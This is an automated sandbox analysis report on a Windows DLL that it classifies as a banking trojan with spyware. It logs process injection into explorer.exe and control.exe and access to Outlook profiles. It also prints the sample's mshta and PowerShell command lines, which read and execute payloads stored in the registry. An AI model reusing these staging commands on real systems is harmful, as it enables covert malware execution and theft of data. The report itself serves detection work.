Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F67B01 GetProcAddress,NtCreateSection,memset,	0_2_02F67B01
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F6B2FD NtQueryVirtualMemory,	0_2_02F6B2FD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0122B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,	0_2_0122B780
Source: C:\Windows\explorer.exe	Code function: 37_2_03B623A4 NtQueryInformationProcess,	37_2_03B623A4
Source: C:\Windows\explorer.exe	Code function: 37_2_03B613A8 NtMapViewOfSection,	37_2_03B613A8
Source: C:\Windows\explorer.exe	Code function: 37_2_03B58790 NtCreateSection,	37_2_03B58790
Source: C:\Windows\explorer.exe	Code function: 37_2_03B60BE8 NtReadVirtualMemory,	37_2_03B60BE8
Source: C:\Windows\explorer.exe	Code function: 37_2_03B52710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	37_2_03B52710
Source: C:\Windows\explorer.exe	Code function: 37_2_03B672AC NtWriteVirtualMemory,	37_2_03B672AC
Source: C:\Windows\explorer.exe	Code function: 37_2_03B68208 RtlAllocateHeap,NtQueryInformationProcess,	37_2_03B68208
Source: C:\Windows\explorer.exe	Code function: 37_2_03B76A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	37_2_03B76A5C
Source: C:\Windows\explorer.exe	Code function: 37_2_03B62DC4 NtQueryInformationProcess,	37_2_03B62DC4
Source: C:\Windows\explorer.exe	Code function: 37_2_03B710A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	37_2_03B710A0
Source: C:\Windows\explorer.exe	Code function: 37_2_03B6F0C0 NtAllocateVirtualMemory,	37_2_03B6F0C0
Source: C:\Windows\explorer.exe	Code function: 37_2_03B68800 NtQuerySystemInformation,	37_2_03B68800
Source: C:\Windows\explorer.exe	Code function: 37_2_03B8A004 NtProtectVirtualMemory,NtProtectVirtualMemory,	37_2_03B8A004
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C10A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	38_2_009C10A0
Source: C:\Windows\System32\control.exe	Code function: 38_2_009BF0C0 NtAllocateVirtualMemory,	38_2_009BF0C0
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B72AC NtWriteVirtualMemory,	38_2_009B72AC
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B8208 NtQueryInformationProcess,	38_2_009B8208
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C6A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	38_2_009C6A5C
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A8790 NtCreateSection,	38_2_009A8790
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B13A8 NtMapViewOfSection,	38_2_009B13A8
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B23A4 NtQueryInformationProcess,	38_2_009B23A4
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B0BE8 NtReadVirtualMemory,	38_2_009B0BE8
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	38_2_009A2710
Source: C:\Windows\System32\control.exe	Code function: 38_2_009DA004 NtProtectVirtualMemory,NtProtectVirtualMemory,	38_2_009DA004

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_015121D4	0_2_015121D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100014EE	0_2_100014EE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100012F1	0_2_100012F1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000155A	0_2_1000155A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100037DC	0_2_100037DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F6B0DC	0_2_02F6B0DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F65920	0_2_02F65920
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5E2F0	37_2_03B5E2F0
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5F204	37_2_03B5F204
Source: C:\Windows\explorer.exe	Code function: 37_2_03B76A5C	37_2_03B76A5C
Source: C:\Windows\explorer.exe	Code function: 37_2_03B70180	37_2_03B70180
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5BD6C	37_2_03B5BD6C
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5F8AC	37_2_03B5F8AC
Source: C:\Windows\explorer.exe	Code function: 37_2_03B79494	37_2_03B79494
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5C0C0	37_2_03B5C0C0
Source: C:\Windows\explorer.exe	Code function: 37_2_03B60C34	37_2_03B60C34
Source: C:\Windows\explorer.exe	Code function: 37_2_03B6A054	37_2_03B6A054
Source: C:\Windows\explorer.exe	Code function: 37_2_03B6D3A0	37_2_03B6D3A0
Source: C:\Windows\explorer.exe	Code function: 37_2_03B57FCC	37_2_03B57FCC
Source: C:\Windows\explorer.exe	Code function: 37_2_03B78320	37_2_03B78320
Source: C:\Windows\explorer.exe	Code function: 37_2_03B78B18	37_2_03B78B18
Source: C:\Windows\explorer.exe	Code function: 37_2_03B52F0C	37_2_03B52F0C
Source: C:\Windows\explorer.exe	Code function: 37_2_03B54E94	37_2_03B54E94
Source: C:\Windows\explorer.exe	Code function: 37_2_03B74290	37_2_03B74290
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5DEF0	37_2_03B5DEF0
Source: C:\Windows\explorer.exe	Code function: 37_2_03B51EFC	37_2_03B51EFC
Source: C:\Windows\explorer.exe	Code function: 37_2_03B66A34	37_2_03B66A34
Source: C:\Windows\explorer.exe	Code function: 37_2_03B7062C	37_2_03B7062C
Source: C:\Windows\explorer.exe	Code function: 37_2_03B6B210	37_2_03B6B210
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5AA50	37_2_03B5AA50
Source: C:\Windows\explorer.exe	Code function: 37_2_03B77A5C	37_2_03B77A5C
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5CE44	37_2_03B5CE44
Source: C:\Windows\explorer.exe	Code function: 37_2_03B595A8	37_2_03B595A8
Source: C:\Windows\explorer.exe	Code function: 37_2_03B619D4	37_2_03B619D4
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5C9D0	37_2_03B5C9D0
Source: C:\Windows\explorer.exe	Code function: 37_2_03B68D74	37_2_03B68D74
Source: C:\Windows\explorer.exe	Code function: 37_2_03B70C88	37_2_03B70C88
Source: C:\Windows\explorer.exe	Code function: 37_2_03B560E4	37_2_03B560E4
Source: C:\Windows\explorer.exe	Code function: 37_2_03B6DCE4	37_2_03B6DCE4
Source: C:\Windows\explorer.exe	Code function: 37_2_03B548E8	37_2_03B548E8
Source: C:\Windows\explorer.exe	Code function: 37_2_03B65030	37_2_03B65030
Source: C:\Windows\System32\control.exe	Code function: 38_2_009AF8AC	38_2_009AF8AC
Source: C:\Windows\System32\control.exe	Code function: 38_2_009AE2F0	38_2_009AE2F0
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C6A5C	38_2_009C6A5C
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C9494	38_2_009C9494
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C0C88	38_2_009C0C88
Source: C:\Windows\System32\control.exe	Code function: 38_2_009AC0C0	38_2_009AC0C0
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A48E8	38_2_009A48E8
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A60E4	38_2_009A60E4
Source: C:\Windows\System32\control.exe	Code function: 38_2_009BDCE4	38_2_009BDCE4
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B5030	38_2_009B5030
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B0C34	38_2_009B0C34
Source: C:\Windows\System32\control.exe	Code function: 38_2_009BA054	38_2_009BA054
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C0180	38_2_009C0180
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A95A8	38_2_009A95A8
Source: C:\Windows\System32\control.exe	Code function: 38_2_009AC9D0	38_2_009AC9D0
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B19D4	38_2_009B19D4
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B8D74	38_2_009B8D74
Source: C:\Windows\System32\control.exe	Code function: 38_2_009ABD6C	38_2_009ABD6C
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C4290	38_2_009C4290
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A4E94	38_2_009A4E94
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A1EFC	38_2_009A1EFC
Source: C:\Windows\System32\control.exe	Code function: 38_2_009ADEF0	38_2_009ADEF0
Source: C:\Windows\System32\control.exe	Code function: 38_2_009BB210	38_2_009BB210
Source: C:\Windows\System32\control.exe	Code function: 38_2_009AF204	38_2_009AF204
Source: C:\Windows\System32\control.exe	Code function: 38_2_009B6A34	38_2_009B6A34
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C062C	38_2_009C062C
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C7A5C	38_2_009C7A5C
Source: C:\Windows\System32\control.exe	Code function: 38_2_009AAA50	38_2_009AAA50
Source: C:\Windows\System32\control.exe	Code function: 38_2_009ACE44	38_2_009ACE44
Source: C:\Windows\System32\control.exe	Code function: 38_2_009BD3A0	38_2_009BD3A0
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A7FCC	38_2_009A7FCC
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C8B18	38_2_009C8B18
Source: C:\Windows\System32\control.exe	Code function: 38_2_009A2F0C	38_2_009A2F0C
Source: C:\Windows\System32\control.exe	Code function: 38_2_009C8320	38_2_009C8320

Source: 5fd9d7ec9e7aetar.dll

Static PE information: invalid certificate

Source: lcbc4odh.dll.33.dr	Static PE information: No import functions for PE file found
Source: 00wddsye.dll.35.dr	Static PE information: No import functions for PE file found

Source: 5fd9d7ec9e7aetar.dll

Binary or memory string: OriginalFilenameSetACL.exe. vs 5fd9d7ec9e7aetar.dll

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe	Section loaded: msoert2.dll
Source: C:\Windows\explorer.exe	Section loaded: msimg32.dll

Source: 44E8.bin.37.dr

Binary string: Boot Device: \Device\HarddiskVolume2

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@43/54@6/4

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02F656A2 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_02F656A2

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CB1D97F9-3FD1-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{80E0D293-DF59-B25D-69B4-8306AD28679A}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{BC1CCCFF-EB50-4EB1-55B0-4F6259E4F3B6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF40EAD1D3FC8CB615.TMP

Jump to behavior

Source: 5fd9d7ec9e7aetar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5fd9d7ec9e7aetar.dll	Virustotal: Detection: 12%
Source: 5fd9d7ec9e7aetar.dll	ReversingLabs: Detection: 10%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5fd9d7ec9e7aetar.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.422043781.000001E6E70F0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.431207881.000001C0B2EA0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000025.00000000.461622746.000000000EC20000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.443921700.0000000004840000.00000004.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.pdb source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000025.00000003.466485518.00000000074E0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.443921700.0000000004840000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000025.00000003.466485518.00000000074E0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000026.00000002.460815536.0000026AEFA6C000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.460815536.0000026AEFA6C000.00000004.00000040.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.pdbXPEu source: powershell.exe, 0000001C.00000002.495339304.0000022494A24000.00000004.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.pdb source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.pdbXPEu source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000025.00000000.461622746.000000000EC20000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))			Jump to behavior

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'	Jump to behavior

Source: 5fd9d7ec9e7aetar.dll	Static PE information: section name: .data3
Source: 5fd9d7ec9e7aetar.dll	Static PE information: section name: .data7
Source: 5fd9d7ec9e7aetar.dll	Static PE information: section name: .data6
Source: 5fd9d7ec9e7aetar.dll	Static PE information: section name: .data5
Source: 5fd9d7ec9e7aetar.dll	Static PE information: section name: .data4

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_015121C3 push ecx; ret	0_2_015121D3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01512170 push ecx; ret	0_2_01512179
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10013020 push ecx; ret	0_2_1001305B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002823 push edx; retf	0_2_10002826
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000408A push ecx; retf	0_2_1000408B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100020B3 push eax; retf	0_2_10002114
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100094B5 push edi; ret	0_2_100094BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002AC0 push ebx; retf	0_2_10002AC2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002AC4 push ebp; retf	0_2_10002AC8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10005AEE push esp; retf	0_2_10005AFC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100022F6 pushfd ; retf	0_2_100022FC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10008F01 push esi; retf	0_2_10008F04
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001D25 push ss; iretd	0_2_10001D26
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B3B push ds; retf	0_2_10003B3E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B40 push ds; retf	0_2_10003B46
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B47 push ds; retf	0_2_10003B4A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000274B push ebp; retf	0_2_1000274C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B4B push ds; retf	0_2_10003B4E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B53 push ds; retf	0_2_10003B56
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B5B push ds; retf	0_2_10003B5E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B61 push ds; retf	0_2_10003B62
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003B63 push ds; retf	0_2_10003B66
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009F97 push ecx; ret	0_2_10009F9F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003BA0 push ds; retf	0_2_10003BA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001BA7 push esi; retf	0_2_10001BA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003BA9 push ds; retf	0_2_10003BB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003BB1 push ds; retf	0_2_10003BB4
